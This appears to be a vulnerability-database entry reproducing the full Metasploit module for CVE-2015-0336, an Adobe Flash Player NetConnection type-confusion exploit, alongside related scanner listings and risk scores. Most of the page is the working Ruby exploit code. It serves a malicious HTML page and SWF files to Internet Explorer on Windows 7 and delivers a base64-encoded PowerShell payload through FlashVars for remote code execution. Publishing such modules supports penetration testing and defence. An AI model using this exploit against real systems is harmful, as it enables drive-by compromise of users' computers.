Adobe Flash Player - NetConnection Type Confusion (Metasploit)

🗓️ 08 May 2015 00:00:00Reported by MetasploitType

Adobe Flash Player NetConnection Type Confusion allows remote code execution by exploiting a type confusion vulnerability in the NetConnection class on Adobe Flash Player. It has been successfully tested on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305

Reporter	Title	Published	Views	Family All 67
0day.today	Adobe Flash Player NetConnection Type Confusion Exploit	8 May 201500:00	–	zdt
Tenable Nessus	Flash Player < 17.0 Multiple Vulnerabilities (APSB15-05)	27 Mar 201500:00	–	nessus
Tenable Nessus	Flash Player < 16.0.0.306 (inferred) Multiple Vulnerabilities (APSB15-01 through 05)	27 Mar 201500:00	–	nessus
Tenable Nessus	Adobe AIR < 17.0.0.144 Multiple Vulnerabilities (APSB15-05)	24 Jul 201500:00	–	nessus
Tenable Nessus	Adobe AIR <= 17.0.0.124 Multiple Vulnerabilities (APSB15-05)	12 Jun 201500:00	–	nessus
Tenable Nessus	Flash Player <= 16.0.0.305 Multiple Vulnerabilities (APSB15-05)	13 Mar 201500:00	–	nessus
Tenable Nessus	FreeBSD : Adobe Flash Player -- critical vulnerabilities (8b3ecff5-c9b2-11e4-b71f-00bd5af88c00)	17 Mar 201500:00	–	nessus
Tenable Nessus	GLSA-201503-09 : Adobe Flash Player: Multiple vulnerabilities	24 Mar 201500:00	–	nessus
Tenable Nessus	Adobe AIR for Mac <= 17.0.0.124 Multiple Vulnerabilities (APSB15-05)	12 Jun 201500:00	–	nessus
Tenable Nessus	Flash Player For Mac <= 16.0.0.305 Multiple Vulnerabilities (APSB15-05)	13 Mar 201500:00	–	nessus

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player NetConnection Type Confusion',
      'Description'         => %q{
        This module exploits a type confusion vulnerability in the NetConnection class on
        Adobe Flash Player. When using a correct memory layout this vulnerability allows
        to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
        vectors, and finally accomplish remote code execution. This module has been tested
        successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0336'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
          ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
          ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Mar 12 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    @trigger = create_trigger
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    trigger_hex_stream = @trigger.unpack('H*')[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

  def create_trigger
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end

08 May 2015 00:00Current

9.4High risk

Vulners AI Score9.4

CVSS 29.3

EPSS0.88658